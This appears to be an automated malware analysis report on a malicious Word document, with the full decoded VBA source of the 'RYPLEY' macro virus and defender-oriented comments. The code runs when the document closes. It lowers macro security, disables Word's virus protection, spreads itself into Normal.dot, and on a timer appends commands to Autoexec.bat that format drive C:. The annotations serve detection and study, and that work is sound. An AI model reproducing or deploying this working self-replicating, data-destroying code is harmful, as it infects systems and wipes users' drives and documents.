Malware Insights
The critical ClamAV heuristic indicates this is a known malicious document. The VBA macro attempts to lower Word's security settings by writing to registry keys such as 'HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security\Level' and 'HKEY_CURRENT_USER\Software\Microsoft\VBA\6.0\Common\CodeForeColors'. It also attempts to write to 'HKEY_CURRENT_USER\Software\RYPLEY\CAR\RYPLEY', suggesting potential persistence or configuration. The macro's primary function appears to be disabling security features to facilitate further malicious activity.
Heuristics 2
-
ClamAV: Doc.Trojan.Codefore-1 — critical — CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Trojan.Codefore-1
-
VBA macros detected — medium — OLE_VBA_MACROS: Document contains VBA macro code
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3193 bytes |

SHA-256: c15db01c90eab04f98ff989f77c86707a9afe23252309062a34fb8285548ad61
Preview script — first 1,000 lines of the extracted script
' Module attributes as decoded by olevba. VB_Name "RYPLEY" is the component name that the
' Document_Close routine below compares against before copying itself; VB_Base "1Normal.RYPLEY"
' appears to associate the module with the Normal template (confirm against the OLE stream).
Attribute VB_Name = "RYPLEY"
Attribute VB_Base = "1Normal.RYPLEY"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Document_Close event handler: Word runs this automatically when the infected document is
' closed. The annotations below are analyst notes describing observed behaviour; the code
' itself is unchanged. Detection points for defenders are the HKCU registry writes, the
' temporary file C:\CAR.scf, modification of Normal.dot, and lines appended to C:\Autoexec.bat.
Private Sub Document_Close()
' Suppress every runtime error so partial failures never surface to the user. CAR is declared
' here but is never assigned True anywhere in this routine. Randomize seeds Rnd for the
' probabilistic payload further down.
On Error Resume Next: Dim CAR As Boolean: Randomize
' Short aliases: S = Word's System object (used here for registry access), O = Options,
' L = Selection, F = the selection's font.
Set S = System: Set O = Options: Set L = Selection: Set F = Selection.Font
' Registry writes via System.PrivateProfileString (HKCU only, so no elevation is required).
' Sets the Office 9.0 (Word 2000) macro security Level to "1"; the report's insight reads
' this as lowering macro security. A write to this value is a useful detection signal.
S.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = "1"
' Sets every VBA editor foreground and background colour index to 1, under both the VBA 6.0
' and VBA\Office keys — presumably so that macro text is rendered with identical fore/back
' colours and becomes unreadable in the editor (verify in a sandbox).
S.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\VBA\6.0\Common", "CodeBackColors") = "1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 "
S.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\VBA\6.0\Common", "CodeForeColors") = "1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 "
S.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\VBA\Office", "CodeBackColors") = "1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 "
S.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\VBA\Office", "CodeForeColors") = "1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 "
' Infection marker under HKCU\Software\RYPLEY\CAR\RYPLEY; the value is a Spanish slogan
' ("the best of the five continents"). Its presence is a host-based indicator for this family.
S.PrivateProfileString("", "HKEY_CURRENT_USER\Software\RYPLEY\CAR\", "RYPLEY") = "EL MEJOR DE LOS CINCO CONTINENTES"
' Turns off Word's built-in macro virus protection and the save/conversion prompts that
' would otherwise reveal that Normal.dot is being modified.
O.VirusProtection = False: O.ConfirmConversions = False: O.SavePropertiesPrompt = False: O.SaveNormalPrompt = False
' Forces the Word 97 optimisation flag both as the default and on the active document.
O.OptimizeForWord97byDefault = True: ActiveDocument.OptimizeForWord97 = True
' If Normal.dot carries the read-only attribute (bitwise test of GetAttr), clear it and quit
' Word so the template is writable on the next run. CAR is never True, so both inner
' conditions always hold. Otherwise jump to the RYPLEY label, which immediately follows the
' If block, so the GoTo is effectively a no-op.
If GetAttr(NormalTemplate.Path & "\normal.dot") And vbReadOnly Then
CAR = False
If CAR = False Then SetAttr NormalTemplate.Path & "\normal.dot", vbNormal
If CAR = False Then Application.Quit
Else
GoTo RYPLEY
End If
RYPLEY:
' Replication targets: the first VBA component of the active document (A) and of the Normal
' template (N), plus their code modules.
Set A = ActiveDocument.VBProject.VBComponents.Item(1): Set N = NormalTemplate.VBProject.VBComponents.Item(1)
Set AC = A.CodeModule: Set NC = N.CodeModule
' Dumps the complete source of the first component in the (presumably host) VBProject to
' a temporary file, C:\CAR.scf, which is used as the copy source below and deleted at the end.
Open "c:\CAR.scf" For Output As #1
Print #1, VBProject.VBComponents.Item(1).CodeModule.Lines(1, VBProject.VBComponents.Item(1).CodeModule.CountOfLines)
Close #1
' Overwrites whichever component is not already named "RYPLEY" with the dumped source,
' so infection flows document -> template and template -> document; then renames both.
If A.Name <> "RYPLEY" Then
AC.DeleteLines 1, AC.CountOfLines
AC.AddFromFile ("c:\CAR.scf")
End If
If N.Name <> "RYPLEY" Then
NC.DeleteLines 1, NC.CountOfLines
NC.AddFromFile ("c:\CAR.scf")
End If
A.Name = "RYPLEY": N.Name = "RYPLEY"
' Destructive payload, fired only when the current minute equals the current second:
' appends lines to C:\Autoexec.bat that would run a quick format of drive C: at next boot
' (the piped echo supplies an answer to format's confirmation prompt). These lines in
' Autoexec.bat are a strong indicator of compromise for this family.
If Minute(Now) = Second(Now) Then
Open "C:\Autoexec.bat" For Append As #1
Print #1, ""
Print #1, "@echo s|format c: /q/c/v:RYPLEY >RYPLEY"
Print #1, "@echo y|format c: /q/c/v:RYPLEY >RYPLEY"
Print #1, "@echo o|format c: /q/c/v:RYPLEY >RYPLEY"
Print #1, "@echo t|format c: /q/c/v:RYPLEY >RYPLEY"
Close #1
End If
' Roughly one run in ten (Int(Rnd * 10) is 0 when Rnd < 0.1): selects the whole story,
' deletes it, and replaces the body with the virus name and slogan in centred bold
' 50pt / 20pt Times New Roman.
If Int(Rnd() * 10) < 1 Then
L.WholeStory: L.Delete Unit:=wdCharacter, Count:=1: F.Name = "Times New Roman":
L.ParagraphFormat.Alignment = wdAlignParagraphCenter: F.Bold = wdToggle: F.Size = 50
L.TypeText Text:="RYPLEY": L.TypeParagraph: F.Bold = wdToggle: F.Size = 20:
L.TypeText Text:="EL MEJOR DE LOS CINCO CONTINENTES"
End If
' Stamps the Company document property (another file-level indicator), then saves the
' document over itself so the macro persists in the file, and removes the temporary copy.
ActiveDocument.BuiltInDocumentProperties(wdPropertyCompany) = "IMPUNIX ©"
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
Kill "c:\CAR.scf"
' Author credits, translated from Spanish (original: "IMPUNIX © presenta su Virus: RYPLEY"):
'IMPUNIX © presents its virus: RYPLEY
' (original: "Creado por tHEmASTER & $$Y & XBIT & K@NSERVERO")
'Created by tHEmASTER & $$Y & XBIT & K@NSERVERO
End Sub